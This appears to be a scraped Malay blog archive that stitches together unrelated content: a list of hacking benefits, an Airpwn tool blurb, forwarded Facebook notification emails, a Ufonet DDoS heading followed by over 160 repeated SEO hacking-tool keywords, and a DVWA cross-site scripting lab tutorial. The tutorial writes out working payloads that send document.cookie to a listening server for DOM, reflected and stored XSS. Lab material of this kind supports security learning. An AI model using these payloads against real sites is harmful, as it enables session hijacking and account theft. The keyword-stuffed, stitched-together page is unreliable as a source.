Isnin, Ogos 31, 2020

ADVANTAGE OF ETHICAL HACKING

Advantage of Ethical Hacking

Hacking is quite useful in the following purpose-

1-To recover lost information, especially in case you lost your password.

2-To perform penetration testing to strengthen computer and network security.

3-To put adequate preventative measure in place to prevent security breaches.

4-To have a computer system that prevents malicious hackers from gaining access.

5-Fighting against terrorism and national security breaches.


More info


Airpwn: A Wireless Packet Injector


"Airpwn is a framework for 802.11 (wireless) packet injection. Airpwn listens to incoming wireless packets, and if the data matches a pattern specified in the config files, custom content is injected "spoofed" from the wireless access point. From the perspective of the wireless client, airpwn becomes the server." read more...


Website: http://airpwn.sourceforge.net

Related articles


🎂 Let Jehan Shah know you are thinking of him on his birthday today!

 
  Wish Jehan Shah a happy birthday   Isnin, 31 Ogos 2020       Jehan Shah   Tuliskan pada garis masanya    
   
 
   Facebook
 
   
   
 
Wish Jehan Shah a happy birthday
 
Isnin, 31 Ogos 2020
 
   
Jehan Shah
 
Tuliskan pada garis masanya
 
 
   
   
 
Rancang satu Acara
 
 
   
   
 
Mesej ini telah dihantar ke jkkbatuban.iszu@blogger.com. Jika anda tidak ingin menerima emel-emel ini daripada Facebook pada masa depan, sila Berhenti melanggan.
Facebook, Inc., Attention: Community Support, 1 Facebook Way, Menlo Park, CA 94025
   
   
Untuk membantu mengekalkan akaun anda selamat, jangan majukan e-mel ini. Ketahui Lebih Lanjut
   
 

Ahad, Ogos 30, 2020

Ufonet - Dos And Ddos Attack Tool | How To Install Bot

Related word

  1. Hacking Tools
  2. Best Hacking Tools 2019
  3. Hacking Tools Windows
  4. Pentest Tools For Windows
  5. Pentest Tools Find Subdomains
  6. Hacking Tools Windows 10
  7. Pentest Tools Tcp Port Scanner
  8. Hacker Tools For Mac
  9. Nsa Hack Tools
  10. Pentest Tools Tcp Port Scanner
  11. Best Hacking Tools 2019
  12. Hacking Tools
  13. Hacking Tools Pc
  14. Hacker Tools List
  15. Pentest Tools List
  16. Growth Hacker Tools
  17. Hack Tool Apk No Root
  18. Hack Tools For Games
  19. Pentest Tools Linux
  20. Hacker Tools Github
  21. Hacking Tools 2020
  22. Pentest Tools Kali Linux
  23. Pentest Tools For Android
  24. Hacking Tools Online
  25. Hack Website Online Tool
  26. Blackhat Hacker Tools
  27. Hack App
  28. Pentest Tools For Ubuntu
  29. Pentest Tools Kali Linux
  30. Hacker
  31. Hacking Tools Pc
  32. Hacker Tools List
  33. Hacking Tools Usb
  34. How To Make Hacking Tools
  35. What Are Hacking Tools
  36. Hacker Techniques Tools And Incident Handling
  37. Hack Tools For Games
  38. Hacker Tools Windows
  39. Pentest Tools Framework
  40. Hacker Tools For Windows
  41. Hacker Tools For Ios
  42. Hacker Tools Windows
  43. Kik Hack Tools
  44. Pentest Tools Nmap
  45. Hacker Tools For Mac
  46. Hack Tools Github
  47. Hacking Tools Free Download
  48. Hack Tools Pc
  49. Beginner Hacker Tools
  50. Hack Apps
  51. Hacker Tool Kit
  52. How To Install Pentest Tools In Ubuntu
  53. Hacking Apps
  54. Hack Tools
  55. New Hacker Tools
  56. Pentest Tools Subdomain
  57. How To Make Hacking Tools
  58. Kik Hack Tools
  59. Pentest Tools Framework
  60. Pentest Tools Framework
  61. Hacker Tools Apk Download
  62. New Hack Tools
  63. Pentest Tools Subdomain
  64. Hacker
  65. Pentest Tools Tcp Port Scanner
  66. Hack Tools Pc
  67. How To Hack
  68. Hacker Tools Linux
  69. Hacker Tools 2019
  70. Hacking Apps
  71. Hacker Tools 2019
  72. Hacker Tools Apk
  73. Pentest Tools Nmap
  74. Hacker Tools For Ios
  75. Hacking Tools For Windows Free Download
  76. Hacker Tools For Pc
  77. Hacker
  78. Pentest Tools Review
  79. Hacking Tools Windows
  80. Hacker Search Tools
  81. Pentest Tools Nmap
  82. Hack Tools For Ubuntu
  83. Hackers Toolbox
  84. Pentest Tools Open Source
  85. Underground Hacker Sites
  86. Pentest Reporting Tools
  87. Hacking Tools Windows
  88. Physical Pentest Tools
  89. Pentest Tools Nmap
  90. Pentest Tools Url Fuzzer
  91. New Hack Tools
  92. Hacker Tools Software
  93. Hak5 Tools
  94. Tools For Hacker
  95. Hacking Tools Download
  96. Hack Tools
  97. Pentest Tools Alternative
  98. Usb Pentest Tools
  99. Hacking Tools And Software
  100. Hack Tool Apk No Root
  101. Hacker Tools
  102. Hacker Tools 2019
  103. Hack Tools For Games
  104. Pentest Tools Windows
  105. Black Hat Hacker Tools
  106. Hacks And Tools
  107. Hack Tools Mac
  108. Hacker Techniques Tools And Incident Handling
  109. What Is Hacking Tools
  110. Hack Tools Download
  111. Hack Tools Mac
  112. How To Install Pentest Tools In Ubuntu
  113. Hacker Tools
  114. Hacker Tools 2019
  115. Pentest Tools Bluekeep
  116. Black Hat Hacker Tools
  117. Hack Tools For Mac
  118. Best Hacking Tools 2020
  119. Hack Tools For Games
  120. Pentest Tools Website Vulnerability
  121. Pentest Tools For Ubuntu
  122. Best Hacking Tools 2019
  123. Pentest Tools Download
  124. Hacking Tools Download
  125. Hacker Security Tools
  126. Hacker Search Tools
  127. Computer Hacker
  128. Hack Tools For Mac
  129. Hacking Tools Free Download
  130. Hacker Tools Windows
  131. Pentest Tools Port Scanner
  132. Hak5 Tools
  133. Pentest Tools Apk
  134. Hacking Tools For Games
  135. Pentest Tools Online
  136. Hacking App
  137. Computer Hacker
  138. Pentest Tools Linux
  139. Blackhat Hacker Tools
  140. Hacking Tools For Windows
  141. Hack Tools For Ubuntu
  142. Hack Tools For Games
  143. Hacking Tools Free Download
  144. Hacking Tools For Kali Linux
  145. What Are Hacking Tools
  146. Pentest Tools Free
  147. Hacking Tools For Windows Free Download
  148. Hacker Tools 2019
  149. How To Make Hacking Tools
  150. How To Install Pentest Tools In Ubuntu
  151. Hack Tools Mac
  152. Kik Hack Tools
  153. Pentest Tools Download
  154. Hak5 Tools
  155. Hack App
  156. New Hack Tools
  157. Pentest Tools Website Vulnerability
  158. Hacking Tools 2019
  159. How To Make Hacking Tools
  160. Hacker Tools Apk Download
  161. Hack Tools For Mac

Anda melog masuk ke Maukerja dengan Facebook.

 
    Anda melog masuk ke Maukerja dan berkongsi maklumat Facebook   Mdm, anda baru berkongsi maklumat dengan Maukerja apabila anda log masuk menggunakan Facebook pada 30 Ogos 2020 jam 10:39 PTG. Anda boleh mengubah maklumat yang anda kongsi atau mengeluarkan aplikasi pada bila-bila masa.   Anda berkongsi maklumat berikut dengan Maukerja:   nama dan gambar profil alamat e-mel     Sunting Tetapan     Lawati Pusat Bantuan untuk mengetahui bagaimana untuk memastikan akaun anda selamat.  
   
 
   
 
   
   
 
 
Anda melog masuk ke Maukerja dan berkongsi maklumat Facebook
 
Mdm, anda baru berkongsi maklumat dengan Maukerja apabila anda log masuk menggunakan Facebook pada 30 Ogos 2020 jam 10:39 PTG. Anda boleh mengubah maklumat yang anda kongsi atau mengeluarkan aplikasi pada bila-bila masa.
 
Anda berkongsi maklumat berikut dengan Maukerja:
 
nama dan gambar profil alamat e-mel
 
 
Sunting Tetapan
 
 
Lawati Pusat Bantuan untuk mengetahui bagaimana untuk memastikan akaun anda selamat.
 
   
   
 
Mesej ini telah dihantar ke jkkbatuban.iszu@blogger.com. Jika anda tidak ingin menerima emel-emel ini daripada Facebook pada masa depan, sila Berhenti melanggan.
Facebook, Inc., Attention: Community Support, 1 Facebook Way, Menlo Park, CA 94025
   
 

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.

DOM Based XSS:

Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
http://localhost:9000/vulnerabilities/xss_d/?default=English
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script>
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
python3 -m http.server
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.

Reflected XSS:

Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
<script>alert("XSS")</script>
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
<script>alert(XSS)</script>
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/

Read more